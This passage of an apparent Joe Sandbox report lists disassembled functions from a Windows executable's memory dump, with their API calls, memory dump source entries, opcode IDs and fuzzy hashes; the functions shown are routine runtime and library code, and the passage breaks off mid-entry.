                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$d0F$mscoree.dll
                                                                                      • API String ID: 4061214504-1228497898
                                                                                      • Opcode ID: 68ec74cc4d5ed2b1962cda658303a5c1d54dc42e7f178882e58c54ac44998b42
                                                                                      • Instruction ID: 23e2c25c4ad3d9a5a05950af013dde5f084c776f3058897a5698f0993aa81a53
                                                                                      • Opcode Fuzzy Hash: 68ec74cc4d5ed2b1962cda658303a5c1d54dc42e7f178882e58c54ac44998b42
                                                                                      • Instruction Fuzzy Hash: D1F08C30A00308BFCB05AFA5DC19FAEBFB9EB09716F000068B805E2291DB348944CAA4
                                                                                      Function 00D80050 Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D800AE
                                                                                        • Part of subcall function 00D7A8E0: GetVersionExW.KERNEL32(?), ref: 00D7A905
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D800D0
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D800EA
                                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D800FB
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D8010B
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D80117
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                                      • String ID:
                                                                                      • API String ID: 2092733347-0
                                                                                      • Opcode ID: dfbff17776106dee319fa1299178c4857ab4a56d7e0ce7fbc5cda01ba0e18d42
                                                                                      • Instruction ID: 51675312b11ef4b9ee6beedb6013cd0e541e7c91c57c97ab6ebc223ada76cb49
                                                                                      • Opcode Fuzzy Hash: dfbff17776106dee319fa1299178c4857ab4a56d7e0ce7fbc5cda01ba0e18d42
                                                                                      • Instruction Fuzzy Hash: EF31F67A1083459BC740EFA8C88499BB7F8FF98704F04491EF999C3210E730D549CB2A
                                                                                      Function 00D88206 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: b3d359851e2b7ccf18627faf8282b1a013a4c9f8e4f948fab76b21705fb7a3be
                                                                                      • Instruction ID: d12e228a9d4532de92bfa38e0de6d1cdf3e670c2c234c60ffc106194ee3c669a
                                                                                      • Opcode Fuzzy Hash: b3d359851e2b7ccf18627faf8282b1a013a4c9f8e4f948fab76b21705fb7a3be
                                                                                      • Instruction Fuzzy Hash: 7B21B27664050ABFD7447B10CC81F3B77ACEF547A8B184628FC489A102F670DD456BB4
                                                                                      Function 00D7FB02 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00D7FB07
                                                                                      • EnterCriticalSection.KERNEL32(00DB1E74,00000000,?,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF,?), ref: 00D7FB15
                                                                                      • new.LIBCMT ref: 00D7FB35
                                                                                      • new.LIBCMT ref: 00D7FB6B
                                                                                      • LeaveCriticalSection.KERNEL32(00DB1E74,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF,?,00008000,?), ref: 00D7FB8B
                                                                                      • LeaveCriticalSection.KERNEL32(00DB1E74,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF,?,00008000,?), ref: 00D7FB96
                                                                                        • Part of subcall function 00D7F930: InitializeCriticalSection.KERNEL32(000001A0,00DB1E74,00000000,?,?,00D7FB88,00000020,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?), ref: 00D7F969
                                                                                        • Part of subcall function 00D7F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF), ref: 00D7F973
                                                                                        • Part of subcall function 00D7F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,00D7A7C2,?,00D7C74B,?,00000000,?,00000001,?,?,?,00D83AFF), ref: 00D7F983
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                      • String ID:
                                                                                      • API String ID: 3919453512-0
                                                                                      • Opcode ID: 9d7991a53a1d37ce34c989ff65ee1cdec3123cf0a4c92945f81678fcb3947afe
                                                                                      • Instruction ID: 187dde7c7c497481a34402f8fc546017afc3a21202e69d4da61ecfcdb3f1b2f3
                                                                                      • Opcode Fuzzy Hash: 9d7991a53a1d37ce34c989ff65ee1cdec3123cf0a4c92945f81678fcb3947afe
                                                                                      • Instruction Fuzzy Hash: 79118234A00311EBD724AB68EC65BBD7AB8EB89750F00423AF819D73D0EB70C8008B70
                                                                                      Function 00D9631F Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,00DACBE8,00D92674,00DACBE8,?,?,00D92213,?,?,00DACBE8), ref: 00D96323
                                                                                      • _free.LIBCMT ref: 00D96356
                                                                                      • _free.LIBCMT ref: 00D9637E
                                                                                      • SetLastError.KERNEL32(00000000,?,00DACBE8), ref: 00D9638B
                                                                                      • SetLastError.KERNEL32(00000000,?,00DACBE8), ref: 00D96397
                                                                                      • _abort.LIBCMT ref: 00D9639D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: 6bf507e04e04f28fa68373302d23bb21bb857d0b0a4d16dc3228e881f320ae3a
                                                                                      • Instruction ID: 78479f9114f207c7bd4fa9c16e192485b0615d31e64779c315463f76bc27419c
                                                                                      • Opcode Fuzzy Hash: 6bf507e04e04f28fa68373302d23bb21bb857d0b0a4d16dc3228e881f320ae3a
                                                                                      • Instruction Fuzzy Hash: F1F0AF36605B006ADF123B687D4AB1A2629DBC27B1B2D4224F528E2295EF31DC028779
                                                                                      Function 00D993F3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00D92794,00000000,00000000,00D92FC2,?,00D92FC2,?,00000001,00D92794,F5E85006,00000001,00D92FC2,00D92FC2), ref: 00D99440
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D994C9
                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D994DB
                                                                                      • __freea.LIBCMT ref: 00D994E4
                                                                                        • Part of subcall function 00D959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D923AA,?,0000015D,?,?,?,?,00D92F29,000000FF,00000000,?,?), ref: 00D95A2E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                      • String ID: d0F
                                                                                      • API String ID: 2652629310-1238022483
                                                                                      • Opcode ID: 1db540438e1c08e71fd0324476b1e5e0fbfe811ce14633ebf173cd318f698c9c
                                                                                      • Instruction ID: 0471f92e5b9d3c9dfb25cd9a82804782d52eb6036961d0c755a59ba32e289f71
                                                                                      • Opcode Fuzzy Hash: 1db540438e1c08e71fd0324476b1e5e0fbfe811ce14633ebf173cd318f698c9c
                                                                                      • Instruction Fuzzy Hash: DD318E72A0020AABDF269F68DC55EAEBBA5EB40710F19422CFC05D6290E735CD51CBB4
                                                                                      Function 00D8B820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D712E7: GetDlgItem.USER32(00000000,00003021), ref: 00D7132B
                                                                                        • Part of subcall function 00D712E7: SetWindowTextW.USER32(00000000,00DA02E4), ref: 00D71341
                                                                                      • EndDialog.USER32(?,00000001), ref: 00D8B86B
                                                                                      • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 00D8B881
                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D8B89B
                                                                                      • SetDlgItemTextW.USER32(?,00000066), ref: 00D8B8A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemText$DialogWindow
                                                                                      • String ID: RENAMEDLG
                                                                                      • API String ID: 445417207-3299779563
                                                                                      • Opcode ID: fc4a0a0c062bf0c5b9804734fcf11e6f673b1e9e8a8ee16c5fdd9a3425b1a7a9
                                                                                      • Instruction ID: 80262d00f731a6ca1057817346c2ee58eedec5f5758977db99e501eaace171b9
                                                                                      • Opcode Fuzzy Hash: fc4a0a0c062bf0c5b9804734fcf11e6f673b1e9e8a8ee16c5fdd9a3425b1a7a9
                                                                                      • Instruction Fuzzy Hash: 4001F533A403167AD2116EA9AE49F377B7CEB86B61F040517F240F21A0C766A804EB72
                                                                                      Function 00D7DEB5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D7F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7F324
                                                                                        • Part of subcall function 00D7F309: LoadLibraryW.KERNELBASE(?,?,00D7DEC8,Crypt32.dll,?,00D7DF4A,?,00D7DF2E,?,?,?,?), ref: 00D7F346
                                                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D7DED4
                                                                                      • GetProcAddress.KERNEL32(00DB1E58,CryptUnprotectMemory), ref: 00D7DEE4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                      • API String ID: 2141747552-1753850145
                                                                                      • Opcode ID: 3ad0b708b6d0be73008e5476098616e43a2e52f3b00a160070d4bf00575bbfa8
                                                                                      • Instruction ID: 3a9d0f7272f6e447539272bd301710cb76bedc211e50f4bd57833160902cba57
                                                                                      • Opcode Fuzzy Hash: 3ad0b708b6d0be73008e5476098616e43a2e52f3b00a160070d4bf00575bbfa8
                                                                                      • Instruction Fuzzy Hash: 0CE046B0500743AFDB415B75A808B0AFFA5BFA2714F18C52AF058C2640EBB4E0A88B74
                                                                                      Function 00D989AF Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00D989B8
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D989DB
                                                                                        • Part of subcall function 00D959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D923AA,?,0000015D,?,?,?,?,00D92F29,000000FF,00000000,?,?), ref: 00D95A2E
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D98A01
                                                                                      • _free.LIBCMT ref: 00D98A14
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D98A23
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 336800556-0
                                                                                      • Opcode ID: 42caf953f59dfb2609e1e0d74eda342db18a690cc8d3cc9fbff9a5e9293d7807
                                                                                      • Instruction ID: b492cc35206cd93dc14ff3c3849f4d6e8f0c6a7df2ef543a7d66ab4f93d6faef
                                                                                      • Opcode Fuzzy Hash: 42caf953f59dfb2609e1e0d74eda342db18a690cc8d3cc9fbff9a5e9293d7807
                                                                                      • Instruction Fuzzy Hash: B90184726017157B2B2156BAAC8CC7B6D6DDAC7FA1318012AFD04D3245EE64CC01A6B1
                                                                                      Function 00D963A3 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00D95E43,00D95ADF,?,00D9634D,00000001,00000364,?,00D92213,?,?,00DACBE8), ref: 00D963A8
                                                                                      • _free.LIBCMT ref: 00D963DD
                                                                                      • _free.LIBCMT ref: 00D96404
                                                                                      • SetLastError.KERNEL32(00000000,?,00DACBE8), ref: 00D96411
                                                                                      • SetLastError.KERNEL32(00000000,?,00DACBE8), ref: 00D9641A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free
                                                                                      • String ID:
                                                                                      • API String ID: 3170660625-0
                                                                                      • Opcode ID: 059f2b2ebd6ce84d3974348edd13e6f6905c715d24468b3ef28eb1ee840024f0
                                                                                      • Instruction ID: 9153f96f14b75714161b1ce16f1cac799047e14c4ad440c36501be61317cb7b8
                                                                                      • Opcode Fuzzy Hash: 059f2b2ebd6ce84d3974348edd13e6f6905c715d24468b3ef28eb1ee840024f0
                                                                                      • Instruction Fuzzy Hash: C801D1763497006B9F022B686C89B1A2A29DBD27717294238F424E2282EF35CC014374
                                                                                      Function 00D9926A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00D99282
                                                                                        • Part of subcall function 00D959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?), ref: 00D959D8
                                                                                        • Part of subcall function 00D959C2: GetLastError.KERNEL32(?,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?,?), ref: 00D959EA
                                                                                      • _free.LIBCMT ref: 00D99294
                                                                                      • _free.LIBCMT ref: 00D992A6
                                                                                      • _free.LIBCMT ref: 00D992B8
                                                                                      • _free.LIBCMT ref: 00D992CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: e28a0996950c137ec4ae2b93bbed28c5fe2d5f1623335e6c1b83e4b34bc967a1
                                                                                      • Instruction ID: c80ccb75075e46c8251f427e23718d901927f8060086761dbba199cac820465c
                                                                                      • Opcode Fuzzy Hash: e28a0996950c137ec4ae2b93bbed28c5fe2d5f1623335e6c1b83e4b34bc967a1
                                                                                      • Instruction Fuzzy Hash: DDF0EC32605700BB9F65EB6CF982C5AB7E9EA017207984919F448D7651C724FC80CAB8
                                                                                      Function 00D9553F Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _free.LIBCMT ref: 00D9555D
                                                                                        • Part of subcall function 00D959C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?), ref: 00D959D8
                                                                                        • Part of subcall function 00D959C2: GetLastError.KERNEL32(?,?,00D99301,?,00000000,?,00000000,?,00D99328,?,00000007,?,?,00D99725,?,?), ref: 00D959EA
                                                                                      • _free.LIBCMT ref: 00D9556F
                                                                                      • _free.LIBCMT ref: 00D95582
                                                                                      • _free.LIBCMT ref: 00D95593
                                                                                      • _free.LIBCMT ref: 00D955A4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: 51891a78ecb0cb02b79adb6620eef88c612eb2ace31b2632702bfee39aea86b7
                                                                                      • Instruction ID: 88b64719ee4ec52c259b53ab9f0a6bd91720eff804ae57ca0b223e0fbf111c8a
